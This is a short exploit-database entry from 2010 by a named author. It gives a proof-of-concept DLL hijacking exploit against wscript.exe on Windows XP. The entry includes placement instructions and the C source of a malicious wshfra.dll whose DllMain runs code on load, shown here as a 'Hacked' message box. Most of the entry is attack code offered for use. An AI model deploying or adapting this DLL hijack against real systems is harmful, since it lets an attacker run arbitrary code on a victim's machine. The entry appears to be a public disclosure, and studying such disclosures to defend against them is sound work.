wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
# Published : 2010-08-25
# Author : Mohamed Clay
# Previous Title : Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)
# Next Title : Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

#wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
#Author : Mohamed Clay
#Greetz : linuxac.org && isecur1ty.org && security4arabs.com && v4-team.com && all My Friends
#note : EveryOne is happy with DLL Hijacking YooooPiiii!!!!
#Tested on: Windows XP

#How to use : Place a .jse file and wshfra.dll in same folder and execute the file .

#wshfra.dll(code)

===========================================

#include "stdafx.h"

void init() {
MessageBox(NULL,"Mohamed Clay", "Hacked",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

=============================================